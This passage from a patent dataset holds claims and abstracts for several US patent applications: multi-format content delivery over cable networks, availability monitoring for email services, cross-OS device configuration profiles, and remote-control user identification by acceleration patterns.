ii) transmitting a second version of the specified content encoded in accordance with the second playback format to the repository, the repository accessible by the first playback device and the second playback device. 5. The method as in claim 1, wherein identifying the multiple different playback formats includes:
mapping the first playback device to a first playback format; identifying a second playback format assigned to a second playback device operated in the subscriber domain. 6. The method as in claim 1 further comprising:
providing a notification to a user of the first playback device, the notification querying the user whether to transmit the requested content in a format supported by a second playback device in the subscriber domain. 7. The method as in claim 1, wherein the multiple different playback formats includes a first playback format and a second playback format, the method further comprising:
responsive to the request, streaming the requested content in the first encoding format in accordance with a first playback bit rate and streaming the requested content in the second encoding format in accordance with a second playback bit rate, the second playback bit rate different than the first playback bit rate. 8. The method as in claim 1, wherein transmitting the versions of the requested content includes:
controlling delivery of communications to multiple subscriber domains over a shared communication link including DOCSIS (Data Over Cable Service Interface Specification) channels and non-DOCSIS channels, the shared communication link conveying a first version of the requested content to the subscriber domain over a DOCSIS channel, the shared communication link conveying a second version of the requested content to the subscriber domain over a non-DOCSIS channel. 9. The method as in claim 1, wherein transmitting the versions of the requested content includes:
controlling channels in a shared communication link to multiple subscriber domains including the subscriber domain in which the first playback device is operated, the channels in the shared communication link including a first channel and a second channel, the method further comprising: to satisfy the request: i) transmitting a first encoded version of the requested content to the subscriber domain over the first channel, and ii) transmitting a second encoded version of the requested content to the subscriber domain over the second channel. 10. The method as in claim 3, wherein the subscriber domain is a first subscriber domain of the multiple subscriber domains;
wherein the first channel supports a predetermined bandwidth; and wherein the second channel supports a varying amount of bandwidth. 11. The method as in claim 1 further comprising:
streaming a first version of the content over a broadcast channel of a shared cable network to a repository in the subscriber domain, the first version of the content encoded for playback by a first playback device in the subscriber domain;
providing notification to a second playback device in the subscriber domain that the content has been requested for retrieval;
detecting input provided from the second playback device to stream a second version of the specified content directly to the second playback device; and
initiating transmission of the second version of the specified content over a portion of bandwidth of the shared cable network dedicated to transmission of IP (Internet Protocol) data traffic. 12. The method as in claim 11 further comprising:
to satisfy the request, streaming a first version of the content and a second version of the content over a shared communication link to a repository in the subscriber domain, the first version and second version of content transmitted over bandwidth of the shared communication link supporting QAM modulation, the first version of the content encoded for playback by a first playback device in the subscriber domain, the second version of the content encoded for playback by a second playback device in the subscriber domain. 13. A computer system comprising:
computer processor hardware; and a hardware storage resource coupled to the computer processor hardware, the hardware storage resource storing instructions that, when executed by the at computer processor hardware, cause the computer processor hardware to:
receive a request for content, the request originated from a first playback device operated in a subscriber domain;
identify multiple different playback formats associated with multiple devices operated in the subscriber domain, the multiple devices including the first playback device; and
to satisfy the request, transmit versions of the specified content encoded in accordance with the multiple different playback formats to the subscriber domain. 14. The computer system as in claim 13, wherein the instructions executed by the computer processor hardware cause the computer processor hardware to:
identify a first playback format assigned to the first playback device; and identify a second playback format assigned to a second playback device of the multiple playback devices operated in the subscriber domain. 15. The computer system as in claim 14, wherein the instructions executed by the computer processor hardware cause the computer processor hardware to:
to satisfy the request for content:
i) transmit a first version of the specified content encoded in accordance with the first playback format over a first channel of a shared communication link to the first playback device in the subscriber domain; and
ii) transmit a second version of the specified content encoded in accordance with the second playback format over a second channel of the shared communication link to the second playback device in the subscriber domain. 16. The computer system as in claim 13, wherein the instructions executed by the computer processor hardware cause the computer processor hardware to:
map the first playback device to a first playback format; identify a second playback format assigned to a second playback device operated in the subscriber domain. 17. The computer system as in claim 13, wherein the instructions executed by the computer processor hardware cause the computer processor hardware to:
provide a notification to a user of the first playback device, the notification querying the user whether to transmit the requested content in a format supported by a second playback device in the subscriber domain. 18. The computer system as in claim 13, wherein the multiple different playback formats includes a first playback format and a second playback format; and
wherein the instructions executed by the computer processor hardware cause the computer processor hardware to: responsive to the request, streaming the requested content in the first encoding format in accordance with a first playback bit rate and streaming the requested content in the second encoding format in accordance with a second playback bit rate, the second playback bit rate different than the first playback bit rate. 19. The computer system as in claim 13, wherein the instructions executed by the computer processor hardware cause the computer processor hardware to:
control delivery of communications to multiple subscriber domains over a shared communication link including DOCSIS (Data Over Cable Service Interface Specification) channels and non-DOCSIS channels, the shared communication link conveying a first version of the requested content to the subscriber domain over a DOCSIS channel, the shared communication link conveying a second version of the requested content to the subscriber domain over a non-DOCSIS channel. 20. The computer system as in claim 13, wherein the instructions executed by the computer processor hardware cause the computer processor hardware to:
control channels in a shared communication link to multiple subscriber domains including the subscriber domain in which the first playback device is operated, the channels in the shared communication link including a first channel and a second channel, the method further comprising: to satisfy the request: i) transmit a first encoded version of the requested content to the subscriber domain over the first channel, and ii) transmit a second encoded version of the requested content to the subscriber domain over the second channel. 21. Computer-readable storage hardware having instructions stored thereon, the instructions, when carried out by computer processor hardware, cause the computer processor hardware to:
receive a request for content, the request originated from a first playback device operated in a subscriber domain; identify multiple different playback formats of multiple devices operated in the subscriber domain, the multiple devices including the first playback device; and to satisfy the request, transmit versions of the specified content encoded in accordance with the multiple different playback formats to the subscriber domain. | 2,400 |
9,114 | 9,114 | 15,656,334 | 2,449 | An enhanced availability environment for facilitating a message service provided by a plurality of service elements is disclosed herein. The enhanced availability environment comprises a monitoring element and an enhanced availability element. The monitoring element monitors a first service element of the plurality of service elements for a monitored characteristic, generates monitoring information corresponding to the monitored characteristic, and communicates the monitoring information to the enhanced availability element. The enhanced availability element determines an availability of the first service element for the message service based at least in part on the monitoring information and an availability characteristic of the first service element, and communicates the availability to initiate an availability action. | 1. One or more computer readable media having stored thereon program instructions for implementing an enhanced availability process in a message service provided by a plurality of service elements, wherein the program instructions, when executed by a computer system, direct the computer system to:
receive monitoring information corresponding to a monitored characteristic of a first service element of the plurality of service elements; determine an availability of the first service element for the message service based at least in part on the monitoring information and an availability characteristic of the first service element; and communicate the availability of the first service element to initiate an availability action. 2. The one or more computer readable media of claim 1 wherein to determine the availability of the first service element the program instructions, when executed by the computer system, direct the computer system to:
process the availability characteristic to determine whether the first service element is operative or inoperative;
in response to a determination that the first service element is operative, process the monitoring information to determine if the first service element is available or unavailable. 3. The one or more computer readable media of claim 2 wherein to communicate the availability of the first service element the program instructions, when executed by the computer system, direct the computer system to communicate to a second service element whether the first service element is available or unavailable. 4. The one or more computer readable media of claim 3 wherein the availability action comprises removal of the first service element from the message service when the first service element is unavailable. 5. The one or more computer readable media of claim 4 wherein the program instructions, when executed by the computer system, further direct the computer system to direct service communications to a failover service element of the plurality of service elements in place of the first service element. 6. The one or more computer readable media of claim 3 wherein the message service comprises an email service, and wherein the plurality of service elements comprises a plurality of messaging servers, wherein the first service element comprises one of the plurality of messaging servers and wherein the second service element comprises another one of the plurality of messaging servers. 7. The one or more computer readable media of claim 3 wherein the message service comprises an email service, and wherein the plurality of service elements comprises a plurality entry servers and at least one network load balancer, wherein the first service element comprises one of the plurality of entry servers and wherein the second service element comprises the network load balancer. 8. The one or more computer readable media of claim 1 wherein to receive the monitoring information the program instructions, when executed by the computer system, direct the computer system to receive the monitoring information from a monitoring element. 9. An enhanced availability environment for facilitating a message service provided by a plurality of service elements, the enhanced availability environment comprising:
a monitoring element configured to monitor a first service element of the plurality of service elements for a monitored characteristic, generate monitoring information corresponding to the monitored characteristic, and communicate the monitoring information to an enhanced availability element; and the enhanced availability element configured to determine an availability of the first service element for the message service based at least in part on the monitoring information and an availability characteristic of the first service element, and communicate the availability to initiate an availability action. 10. The enhanced availability environment of claim 9 wherein to determine the availability of the first service element, the enhanced availability element is configured to process the availability characteristic to determine whether the first service element is operative or inoperative, and in response to a determination that the first service element is operative, process the monitoring information to determine if the first service element is available or unavailable. 11. The enhanced availability environment of claim 10 wherein to communicate the availability of the first service element, the enhanced availability element communicates to a second service element whether the first service element is available or unavailable. 12. The enhanced availability environment of claim 11 wherein the availability action comprises a removal of the first service element from the message service when the first service element is unavailable. 13. The enhanced availability environment of claim 9 wherein the availability action comprises a designation of a passive message database hosted by a failover service element as an active message database in place of a previously active message database hosted by the first service element. 14. A method of operating an enhanced availability element to facilitate a message service provided by a plurality of service elements, the method comprising:
receiving monitoring information corresponding to a monitored characteristic of a first service element of the plurality of service elements; determining an availability of the first service element for the message service based at least in part on the monitoring information and an availability characteristic of the first service element; and communicating the availability of the first service element to initiate an availability action. 15. The method of claim 14 wherein determining the availability of the first service element comprises:
processing the availability characteristic to determine whether the first service element is operative or inoperative; and
in response to determining that the first service element is operative, processing the monitoring information to determine if the first service element is available or unavailable. 16. The method of claim 15 wherein communicating the availability of the first service element comprises communicating to a second service element whether the first service element is available or unavailable. 17. The method of claim 16 wherein the availability action comprises removing the first service element from the message service when the first service element is unavailable, and wherein the method further comprises directing service communications to a failover service element of the plurality of service elements in place of the first service element. 18. The method of claim 16 wherein the message service comprises an email service, and wherein the plurality of service elements comprises a plurality messaging servers, wherein the first service element comprises one of the plurality of messaging servers and wherein the second service element comprises another one of the plurality of messaging servers. 19. The method of claim 16 wherein the message service comprises an email service, and wherein the plurality of service elements comprises a plurality entry servers and at least one network load balancer, wherein the first service element comprises one of the plurality of entry servers and wherein the second service element comprises the network load balancer. 20. The method of claim 14 wherein receiving the monitoring information comprises receiving the monitoring information from a monitoring element. | An enhanced availability environment for facilitating a message service provided by a plurality of service elements is disclosed herein. The enhanced availability environment comprises a monitoring element and an enhanced availability element. The monitoring element monitors a first service element of the plurality of service elements for a monitored characteristic, generates monitoring information corresponding to the monitored characteristic, and communicates the monitoring information to the enhanced availability element. The enhanced availability element determines an availability of the first service element for the message service based at least in part on the monitoring information and an availability characteristic of the first service element, and communicates the availability to initiate an availability action.1. One or more computer readable media having stored thereon program instructions for implementing an enhanced availability process in a message service provided by a plurality of service elements, wherein the program instructions, when executed by a computer system, direct the computer system to:
receive monitoring information corresponding to a monitored characteristic of a first service element of the plurality of service elements; determine an availability of the first service element for the message service based at least in part on the monitoring information and an availability characteristic of the first service element; and communicate the availability of the first service element to initiate an availability action. 2. The one or more computer readable media of claim 1 wherein to determine the availability of the first service element the program instructions, when executed by the computer system, direct the computer system to:
process the availability characteristic to determine whether the first service element is operative or inoperative;
in response to a determination that the first service element is operative, process the monitoring information to determine if the first service element is available or unavailable. 3. The one or more computer readable media of claim 2 wherein to communicate the availability of the first service element the program instructions, when executed by the computer system, direct the computer system to communicate to a second service element whether the first service element is available or unavailable. 4. The one or more computer readable media of claim 3 wherein the availability action comprises removal of the first service element from the message service when the first service element is unavailable. 5. The one or more computer readable media of claim 4 wherein the program instructions, when executed by the computer system, further direct the computer system to direct service communications to a failover service element of the plurality of service elements in place of the first service element. 6. The one or more computer readable media of claim 3 wherein the message service comprises an email service, and wherein the plurality of service elements comprises a plurality of messaging servers, wherein the first service element comprises one of the plurality of messaging servers and wherein the second service element comprises another one of the plurality of messaging servers. 7. The one or more computer readable media of claim 3 wherein the message service comprises an email service, and wherein the plurality of service elements comprises a plurality entry servers and at least one network load balancer, wherein the first service element comprises one of the plurality of entry servers and wherein the second service element comprises the network load balancer. 8. The one or more computer readable media of claim 1 wherein to receive the monitoring information the program instructions, when executed by the computer system, direct the computer system to receive the monitoring information from a monitoring element. 9. An enhanced availability environment for facilitating a message service provided by a plurality of service elements, the enhanced availability environment comprising:
a monitoring element configured to monitor a first service element of the plurality of service elements for a monitored characteristic, generate monitoring information corresponding to the monitored characteristic, and communicate the monitoring information to an enhanced availability element; and the enhanced availability element configured to determine an availability of the first service element for the message service based at least in part on the monitoring information and an availability characteristic of the first service element, and communicate the availability to initiate an availability action. 10. The enhanced availability environment of claim 9 wherein to determine the availability of the first service element, the enhanced availability element is configured to process the availability characteristic to determine whether the first service element is operative or inoperative, and in response to a determination that the first service element is operative, process the monitoring information to determine if the first service element is available or unavailable. 11. The enhanced availability environment of claim 10 wherein to communicate the availability of the first service element, the enhanced availability element communicates to a second service element whether the first service element is available or unavailable. 12. The enhanced availability environment of claim 11 wherein the availability action comprises a removal of the first service element from the message service when the first service element is unavailable. 13. The enhanced availability environment of claim 9 wherein the availability action comprises a designation of a passive message database hosted by a failover service element as an active message database in place of a previously active message database hosted by the first service element. 14. A method of operating an enhanced availability element to facilitate a message service provided by a plurality of service elements, the method comprising:
receiving monitoring information corresponding to a monitored characteristic of a first service element of the plurality of service elements; determining an availability of the first service element for the message service based at least in part on the monitoring information and an availability characteristic of the first service element; and communicating the availability of the first service element to initiate an availability action. 15. The method of claim 14 wherein determining the availability of the first service element comprises:
processing the availability characteristic to determine whether the first service element is operative or inoperative; and
in response to determining that the first service element is operative, processing the monitoring information to determine if the first service element is available or unavailable. 16. The method of claim 15 wherein communicating the availability of the first service element comprises communicating to a second service element whether the first service element is available or unavailable. 17. The method of claim 16 wherein the availability action comprises removing the first service element from the message service when the first service element is unavailable, and wherein the method further comprises directing service communications to a failover service element of the plurality of service elements in place of the first service element. 18. The method of claim 16 wherein the message service comprises an email service, and wherein the plurality of service elements comprises a plurality messaging servers, wherein the first service element comprises one of the plurality of messaging servers and wherein the second service element comprises another one of the plurality of messaging servers. 19. The method of claim 16 wherein the message service comprises an email service, and wherein the plurality of service elements comprises a plurality entry servers and at least one network load balancer, wherein the first service element comprises one of the plurality of entry servers and wherein the second service element comprises the network load balancer. 20. The method of claim 14 wherein receiving the monitoring information comprises receiving the monitoring information from a monitoring element. | 2,400 |
9,115 | 9,115 | 15,660,990 | 2,454 | Disclosed are various examples for the dynamic construction of configuration profiles using settings common across different operating systems. A computing environment having a management service can determine variable names for inclusion in configuration profiles based on operating systems. The computing environment can dynamically generate configuration profiles using the appropriate variable names such that the value provided by an administrator is a value or parameter of the variable name for deployment to a client device having an operating system capable of interpreting the value using the variable name. | 1. A system, comprising:
at least one computing device; and program instructions executable in the at least one computing device that, when executed by the at least one computing device, cause the at least one computing device to:
identify a value from a field of at least one user interface, the field being associated with a setting common to a plurality of operating systems;
determine a first variable name for inclusion in a first configuration profile in association with the value based at least in part on a first one of the plurality of operating systems;
determine a second variable name for inclusion in a second configuration profile in association with the value based at least in part on a second one of the plurality of operating systems, the second one of the plurality of operating systems being different than the first one of the plurality of operating systems;
generate the first configuration profile such that the value is a parameter of the first variable name for deployment to a first client device having the first one of the plurality of operating systems installed thereon; and
generate the second configuration profile such that the value is a parameter of the second variable name for deployment to a second client device having the second one of the plurality of operating systems installed thereon. 2. The system of claim 1, wherein:
the first configuration profile comprises a first extensible markup language (XML) document programmatically generated by the at least one computing device; and the second configuration profile comprises a second XML document programmatically generated by the at least one computing device. 3. The system of claim 2, wherein:
the first XML document is generated based at least in part on a first predefined format corresponding to the first one of the plurality of operating systems; and the second XML document is generated based at least in part on a second predefined format corresponding to the second one of the plurality of operating systems. 4. The system of claim 3, wherein the first predefined format is different than the second predefined format. 5. The system of claim 1, further comprising program instructions that, when executed, cause the at least one computing device to:
instruct a first agent application executable on the first client device to configure the first client device using the first variable name and the value; and instruct a second agent application executable on the second client device to configure the second client device using the second variable name and the value. 6. The system of claim 1, further comprising program instructions that, when executed, cause the at least one computing device to maintain a database that comprises a mapping of a name attribute for the field to the first variable name corresponding to the first one of the plurality of operating systems and the second variable name corresponding to the second one of the plurality of operating systems. 7. The system of claim 1, wherein the setting common to the plurality of operating systems is one of: a wireless fidelity (Wi-Fi) network setting, a virtual private network (VPN) setting, and an email server setting. 8. A non-transitory computer-readable medium embodying program code executable in at least one computing device that, when executed by the at least one computing device, causes the at least one computing device to:
identify a value from a field of at least one user interface, the field being associated with a setting common to a plurality of operating systems; determine a first variable name for inclusion in a first configuration profile in association with the value based at least in part on a first one of the plurality of operating systems; determine a second variable name for inclusion in a second configuration profile in association with the value based at least in part on a second one of the plurality of operating systems, the second one of the plurality of operating systems being different than the first one of the plurality of operating systems; generate the first configuration profile such that the value is a parameter of the first variable name for deployment to a first client device having the first one of the plurality of operating systems installed thereon; and generate the second configuration profile such that the value is a parameter of the second variable name for deployment to a second client device having the second one of the plurality of operating systems installed thereon. 9. The non-transitory computer-readable medium of claim 8, wherein:
the first configuration profile comprises a first extensible markup language (XML) document programmatically generated by the at least one computing device; and the second configuration profile comprises a second XML document programmatically generated by the at least one computing device. 10. The non-transitory computer-readable medium of claim 9, wherein:
the first XML document is generated based at least in part on a first predefined format corresponding to the first one of the plurality of operating systems; and the second XML document is generated based at least in part on a second predefined format corresponding to the second one of the plurality of operating systems. 11. The non-transitory computer-readable medium of claim 10, wherein the first predefined format is different than the second predefined format. 12. The non-transitory computer-readable medium of claim 8, further comprising program code that, when executed, causes the at least one computing device to:
instruct a first agent application executable on the first client device to configure the first client device using the first variable name and the value; and instruct a second agent application executable on the second client device to configure the second client device using the second variable name and the value. 13. The non-transitory computer-readable medium of claim 8, further comprising program code that, when executed, causes the at least one computing device to maintain a database that comprises a mapping of a name attribute for the field to the first variable name corresponding to the first one of the plurality of operating systems and the second variable name corresponding to the second one of the plurality of operating systems. 14. The non-transitory computer-readable medium of claim 8, wherein the setting common to the plurality of operating systems is one of: a wireless fidelity (Wi-Fi) network setting, a virtual private network (VPN) setting, and an email server setting. 15. A computer-implemented method, comprising:
identifying a value from a field of at least one user interface, the field being associated with a setting common to a plurality of operating systems; determining a first variable name for inclusion in a first configuration profile in association with the value based at least in part on a first one of the plurality of operating systems; determining a second variable name for inclusion in a second configuration profile in association with the value based at least in part on a second one of the plurality of operating systems, the second one of the plurality of operating systems being different than the first one of the plurality of operating systems; generating the first configuration profile such that the value is a parameter of the first variable name for deployment to a first client device having the first one of the plurality of operating systems installed thereon; and generating the second configuration profile such that the value is a parameter of the second variable name for deployment to a second client device having the second one of the plurality of operating systems installed thereon. 16. The computer-implemented method of claim 15, wherein:
the first configuration profile comprises a first extensible markup language (XML) document programmatically generated by at least one computing device; the second configuration profile comprises a second XML document programmatically generated by the at least one computing device; the first XML document is generated based at least in part on a first predefined format corresponding to the first one of the plurality of operating systems; and the second XML document is generated based at least in part on a second predefined format corresponding to the second one of the plurality of operating systems. 17. The computer-implemented method of claim 16, wherein the first predefined format is different than the second predefined format. 18. The computer-implemented method of claim 15, further comprising:
instructing a first agent application executable on the first client device to configure the first client device using the first variable name and the value; and instructing a second agent application executable on the second client device to configure the second client device using the second variable name and the value. 19. The computer-implemented method of claim 15, further comprising maintaining a database that comprises a mapping of a name attribute for the field to the first variable name corresponding to the first one of the plurality of operating systems and the second variable name corresponding to the second one of the plurality of operating systems. 20. The computer-implemented method of claim 15, wherein the setting common to the plurality of operating systems is one of: a wireless fidelity (Wi-Fi) network setting, a virtual private network (VPN) setting, and an email server setting. | Disclosed are various examples for the dynamic construction of configuration profiles using settings common across different operating systems. A computing environment having a management service can determine variable names for inclusion in configuration profiles based on operating systems. The computing environment can dynamically generate configuration profiles using the appropriate variable names such that the value provided by an administrator is a value or parameter of the variable name for deployment to a client device having an operating system capable of interpreting the value using the variable name.1. A system, comprising:
at least one computing device; and program instructions executable in the at least one computing device that, when executed by the at least one computing device, cause the at least one computing device to:
identify a value from a field of at least one user interface, the field being associated with a setting common to a plurality of operating systems;
determine a first variable name for inclusion in a first configuration profile in association with the value based at least in part on a first one of the plurality of operating systems;
determine a second variable name for inclusion in a second configuration profile in association with the value based at least in part on a second one of the plurality of operating systems, the second one of the plurality of operating systems being different than the first one of the plurality of operating systems;
generate the first configuration profile such that the value is a parameter of the first variable name for deployment to a first client device having the first one of the plurality of operating systems installed thereon; and
generate the second configuration profile such that the value is a parameter of the second variable name for deployment to a second client device having the second one of the plurality of operating systems installed thereon. 2. The system of claim 1, wherein:
the first configuration profile comprises a first extensible markup language (XML) document programmatically generated by the at least one computing device; and the second configuration profile comprises a second XML document programmatically generated by the at least one computing device. 3. The system of claim 2, wherein:
the first XML document is generated based at least in part on a first predefined format corresponding to the first one of the plurality of operating systems; and the second XML document is generated based at least in part on a second predefined format corresponding to the second one of the plurality of operating systems. 4. The system of claim 3, wherein the first predefined format is different than the second predefined format. 5. The system of claim 1, further comprising program instructions that, when executed, cause the at least one computing device to:
instruct a first agent application executable on the first client device to configure the first client device using the first variable name and the value; and instruct a second agent application executable on the second client device to configure the second client device using the second variable name and the value. 6. The system of claim 1, further comprising program instructions that, when executed, cause the at least one computing device to maintain a database that comprises a mapping of a name attribute for the field to the first variable name corresponding to the first one of the plurality of operating systems and the second variable name corresponding to the second one of the plurality of operating systems. 7. The system of claim 1, wherein the setting common to the plurality of operating systems is one of: a wireless fidelity (Wi-Fi) network setting, a virtual private network (VPN) setting, and an email server setting. 8. A non-transitory computer-readable medium embodying program code executable in at least one computing device that, when executed by the at least one computing device, causes the at least one computing device to:
identify a value from a field of at least one user interface, the field being associated with a setting common to a plurality of operating systems; determine a first variable name for inclusion in a first configuration profile in association with the value based at least in part on a first one of the plurality of operating systems; determine a second variable name for inclusion in a second configuration profile in association with the value based at least in part on a second one of the plurality of operating systems, the second one of the plurality of operating systems being different than the first one of the plurality of operating systems; generate the first configuration profile such that the value is a parameter of the first variable name for deployment to a first client device having the first one of the plurality of operating systems installed thereon; and generate the second configuration profile such that the value is a parameter of the second variable name for deployment to a second client device having the second one of the plurality of operating systems installed thereon. 9. The non-transitory computer-readable medium of claim 8, wherein:
the first configuration profile comprises a first extensible markup language (XML) document programmatically generated by the at least one computing device; and the second configuration profile comprises a second XML document programmatically generated by the at least one computing device. 10. The non-transitory computer-readable medium of claim 9, wherein:
the first XML document is generated based at least in part on a first predefined format corresponding to the first one of the plurality of operating systems; and the second XML document is generated based at least in part on a second predefined format corresponding to the second one of the plurality of operating systems. 11. The non-transitory computer-readable medium of claim 10, wherein the first predefined format is different than the second predefined format. 12. The non-transitory computer-readable medium of claim 8, further comprising program code that, when executed, causes the at least one computing device to:
instruct a first agent application executable on the first client device to configure the first client device using the first variable name and the value; and instruct a second agent application executable on the second client device to configure the second client device using the second variable name and the value. 13. The non-transitory computer-readable medium of claim 8, further comprising program code that, when executed, causes the at least one computing device to maintain a database that comprises a mapping of a name attribute for the field to the first variable name corresponding to the first one of the plurality of operating systems and the second variable name corresponding to the second one of the plurality of operating systems. 14. The non-transitory computer-readable medium of claim 8, wherein the setting common to the plurality of operating systems is one of: a wireless fidelity (Wi-Fi) network setting, a virtual private network (VPN) setting, and an email server setting. 15. A computer-implemented method, comprising:
identifying a value from a field of at least one user interface, the field being associated with a setting common to a plurality of operating systems; determining a first variable name for inclusion in a first configuration profile in association with the value based at least in part on a first one of the plurality of operating systems; determining a second variable name for inclusion in a second configuration profile in association with the value based at least in part on a second one of the plurality of operating systems, the second one of the plurality of operating systems being different than the first one of the plurality of operating systems; generating the first configuration profile such that the value is a parameter of the first variable name for deployment to a first client device having the first one of the plurality of operating systems installed thereon; and generating the second configuration profile such that the value is a parameter of the second variable name for deployment to a second client device having the second one of the plurality of operating systems installed thereon. 16. The computer-implemented method of claim 15, wherein:
the first configuration profile comprises a first extensible markup language (XML) document programmatically generated by at least one computing device; the second configuration profile comprises a second XML document programmatically generated by the at least one computing device; the first XML document is generated based at least in part on a first predefined format corresponding to the first one of the plurality of operating systems; and the second XML document is generated based at least in part on a second predefined format corresponding to the second one of the plurality of operating systems. 17. The computer-implemented method of claim 16, wherein the first predefined format is different than the second predefined format. 18. The computer-implemented method of claim 15, further comprising:
instructing a first agent application executable on the first client device to configure the first client device using the first variable name and the value; and instructing a second agent application executable on the second client device to configure the second client device using the second variable name and the value. 19. The computer-implemented method of claim 15, further comprising maintaining a database that comprises a mapping of a name attribute for the field to the first variable name corresponding to the first one of the plurality of operating systems and the second variable name corresponding to the second one of the plurality of operating systems. 20. The computer-implemented method of claim 15, wherein the setting common to the plurality of operating systems is one of: a wireless fidelity (Wi-Fi) network setting, a virtual private network (VPN) setting, and an email server setting. | 2,400 |
9,116 | 9,116 | 14,967,562 | 2,422 | Methods, and system, and entertainment device are provided for identifying a user. A method includes detecting acceleration of a user manipulated component, comparing the detected acceleration with user acceleration that is associated with a user of the electronic device, identifying the user of the electronic device based on the comparison of the detected acceleration and the user acceleration, and operating the electronic device based on the identified user of the electronic device. | 1. A method of identifying a user of an electronic device, the method comprising:
detecting an acceleration noise pattern of a user manipulated component, wherein detecting the acceleration noise pattern of the user manipulated component further comprises detecting acceleration with an accelerometer and a gyroscope while the user manipulated component is at rest in a hand of a user of the electronic device; comparing the detected acceleration noise pattern with user acceleration that is associated with the user of the electronic device, wherein comparing includes comparing time domain data of the detected acceleration noise pattern with time domain data of the user acceleration; identifying the user of the electronic device based on the comparison of the detected acceleration noise pattern and the user acceleration; and operating the electronic device based on the identified user of the electronic device. 2. The method of claim 1 further comprising:
selecting the user of the electronic device;
capturing the user acceleration;
associating the user acceleration with the user of the electronic device; and
storing the user acceleration. 3. The method of claim 1 further including turning on components of the user manipulated component based on the acceleration of the user manipulated component and further including turning off the components of the user manipulated component based on the detected acceleration noise pattern indicating that the user manipulated component has been set down. 4. The method of claim 1 further including loading user specific operating characteristics for the identified user, and wherein operating the electronic device further comprises operating the electronic device based on the loaded user specific operating characteristics. 5. The method of claim 4 wherein loading the user specific operating characteristics further comprises loading at least one of programming recommendations for the user, a list of favorite channels specified by the user, parental control information associated with the user, purchase information associated with the user, and remote control codes. 6. The method of claim 1 wherein comparing the detected acceleration noise pattern with the user acceleration includes comparing the user acceleration with the detected acceleration when the user picks up the user manipulated component. 7. The method of claim 1, wherein comparing time domain data with the user acceleration includes comparing using Viterbi methods, Fano methods, or combinations thereof. 8. An entertainment system comprising:
a television receiver configured to receive video content from a media service provider; a remote control configured to interact with the television receiver and including control logic operable to:
detect an acceleration noise pattern of the remote control while the remote control is at rest in a hand of a user of the remote control;
compare the detected acceleration noise pattern with user acceleration that is associated with a user of the television receiver, wherein the control logic is further operable to compare time domain data of the detected acceleration noise pattern with time domain data of the user acceleration;
identify the user of the television receiver based on the comparison of the detected acceleration noise pattern and the user acceleration; and
operate the television receiver based on the identified user of the television receiver. 9. The entertainment system of claim 8 wherein the television receiver further comprises control logic operable to:
select the user of the television receiver;
capture the user acceleration;
associate the user acceleration with the user of the television receiver; and
store the user acceleration;
load at least one of programming recommendations for the user, a list of favorite channels specified by the user, parental control information associated with the user, purchase information associated with the user, and remote control codes. 10. The entertainment system of claim 8 wherein the control logic is further operable to turn on components of the remote control based on the detected acceleration noise pattern of the remote control and is further operable to turn off the components of the remote control based on the detected acceleration noise pattern indicating that the remote control has been set down. 11. The entertainment system of claim 8 wherein the remote control further comprises an accelerometer and a gyroscope, and wherein the control logic of the remote control is further operable to detect acceleration with the accelerometer and the gyroscope. 12. The entertainment system of claim 8 wherein the control logic of the remote control is further operable to compare the user acceleration with the detected acceleration noise pattern when the user is picking up the remote control. 13. An entertainment device comprising:
an accelerometer; and control logic operable to:
detect an acceleration noise pattern of the entertainment device using the accelerometer while the remote control is at rest in a hand of a user of the remote control;
compare the detected acceleration noise pattern with user acceleration that is associated with a user of the entertainment device, wherein the control logic is further operable to compare time domain data of the detected acceleration noise pattern with time domain data of the user acceleration;
identify the user of the entertainment device based on the comparison of the detected acceleration noise pattern and the user acceleration; and
operate the entertainment device based on the identified user of the entertainment device. 14. The entertainment device of claim 13 further comprising an indicator light, and wherein the control logic is further operable to turn on components of the entertainment device based on the acceleration of the entertainment device, and where the control logic is further operable to turn off the components of the entertainment device based on acceleration indicating that the entertainment device has been set down. 15. The entertainment device of claim 13 further comprising a gyroscope, and wherein the control logic is further operable to detect acceleration with the accelerometer and the gyroscope. 16. The entertainment device of claim 13 wherein the control logic is further operable to compare the user acceleration noise pattern with the detected acceleration when the user is picking up the entertainment device. | Methods, and system, and entertainment device are provided for identifying a user. A method includes detecting acceleration of a user manipulated component, comparing the detected acceleration with user acceleration that is associated with a user of the electronic device, identifying the user of the electronic device based on the comparison of the detected acceleration and the user acceleration, and operating the electronic device based on the identified user of the electronic device.1. A method of identifying a user of an electronic device, the method comprising:
detecting an acceleration noise pattern of a user manipulated component, wherein detecting the acceleration noise pattern of the user manipulated component further comprises detecting acceleration with an accelerometer and a gyroscope while the user manipulated component is at rest in a hand of a user of the electronic device; comparing the detected acceleration noise pattern with user acceleration that is associated with the user of the electronic device, wherein comparing includes comparing time domain data of the detected acceleration noise pattern with time domain data of the user acceleration; identifying the user of the electronic device based on the comparison of the detected acceleration noise pattern and the user acceleration; and operating the electronic device based on the identified user of the electronic device. 2. The method of claim 1 further comprising:
selecting the user of the electronic device;
capturing the user acceleration;
associating the user acceleration with the user of the electronic device; and
storing the user acceleration. 3. The method of claim 1 further including turning on components of the user manipulated component based on the acceleration of the user manipulated component and further including turning off the components of the user manipulated component based on the detected acceleration noise pattern indicating that the user manipulated component has been set down. 4. The method of claim 1 further including loading user specific operating characteristics for the identified user, and wherein operating the electronic device further comprises operating the electronic device based on the loaded user specific operating characteristics. 5. The method of claim 4 wherein loading the user specific operating characteristics further comprises loading at least one of programming recommendations for the user, a list of favorite channels specified by the user, parental control information associated with the user, purchase information associated with the user, and remote control codes. 6. The method of claim 1 wherein comparing the detected acceleration noise pattern with the user acceleration includes comparing the user acceleration with the detected acceleration when the user picks up the user manipulated component. 7. The method of claim 1, wherein comparing time domain data with the user acceleration includes comparing using Viterbi methods, Fano methods, or combinations thereof. 8. An entertainment system comprising:
a television receiver configured to receive video content from a media service provider; a remote control configured to interact with the television receiver and including control logic operable to:
detect an acceleration noise pattern of the remote control while the remote control is at rest in a hand of a user of the remote control;
compare the detected acceleration noise pattern with user acceleration that is associated with a user of the television receiver, wherein the control logic is further operable to compare time domain data of the detected acceleration noise pattern with time domain data of the user acceleration;
identify the user of the television receiver based on the comparison of the detected acceleration noise pattern and the user acceleration; and
operate the television receiver based on the identified user of the television receiver. 9. The entertainment system of claim 8 wherein the television receiver further comprises control logic operable to:
select the user of the television receiver;
capture the user acceleration;
associate the user acceleration with the user of the television receiver; and
store the user acceleration;
